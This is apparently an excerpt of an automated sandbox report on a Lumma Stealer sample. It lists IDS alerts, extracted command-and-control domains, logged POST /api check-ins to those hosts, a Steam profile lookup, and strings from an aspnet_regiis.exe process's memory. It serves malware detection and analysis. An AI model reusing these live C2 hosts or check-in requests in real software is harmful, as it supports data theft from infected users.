    Source: Network trafficSuricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:49533 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:55368 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49737 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49732 -> 172.67.152.13:443
    Source: Network trafficSuricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49731 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 104.21.30.221:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.30.221:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.141.136:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.141.136:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 172.67.205.156:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.205.156:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.28.222:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.28.222:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 172.67.152.13:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.152.13:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49738 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.46.170:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.46.170:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49740 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.53.8:443
    Source: Malware configuration extractorURLs: enlargkiw.sbs
    Source: Malware configuration extractorURLs: allocatinow.sbs
    Source: Malware configuration extractorURLs: ehticsprocw.sbs
    Source: Malware configuration extractorURLs: drawwyobstacw.sbs
    Source: Malware configuration extractorURLs: vennurviot.sbs
    Source: Malware configuration extractorURLs: condifendteu.sbs
    Source: Malware configuration extractorURLs: resinedyw.sbs
    Source: Malware configuration extractorURLs: passimovrt.cfd
    Source: Malware configuration extractorURLs: mathcucom.sbs
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passimovrt.cfd
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=1XYT51TuC4g_X2vBeD8OSXAP7fq2lr4kj4ls6Z9CPMI-1728874871-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: passimovrt.cfd
    Source: global trafficDNS traffic detected: DNS query: mathcucom.sbs
    Source: global trafficDNS traffic detected: DNS query: allocatinow.sbs
    Source: global trafficDNS traffic detected: DNS query: enlargkiw.sbs
    Source: global trafficDNS traffic detected: DNS query: resinedyw.sbs
    Source: global trafficDNS traffic detected: DNS query: vennurviot.sbs
    Source: global trafficDNS traffic detected: DNS query: ehticsprocw.sbs
    Source: global trafficDNS traffic detected: DNS query: condifendteu.sbs
    Source: global trafficDNS traffic detected: DNS query: drawwyobstacw.sbs
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passimovrt.cfd
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/
    Source: aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/api
    Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/apir
    Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/pi
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.a#h
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engliHh
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamehY
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/
    Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api
    Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api2
    Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/apiPy
    Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/apiq#V
    Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/g
    Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/y#W
    Source: aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passimovrt.cfd/
    Source: aspnet_regiis.exe, 00000002.00000002.1972630357.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passimovrt.cfd/api
    Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/
    Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/api
    Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/apiq#V
    Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs:443/api
    Source: aspnet_regiis.exe, 00000002.00000002.1972630357.0000000002918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
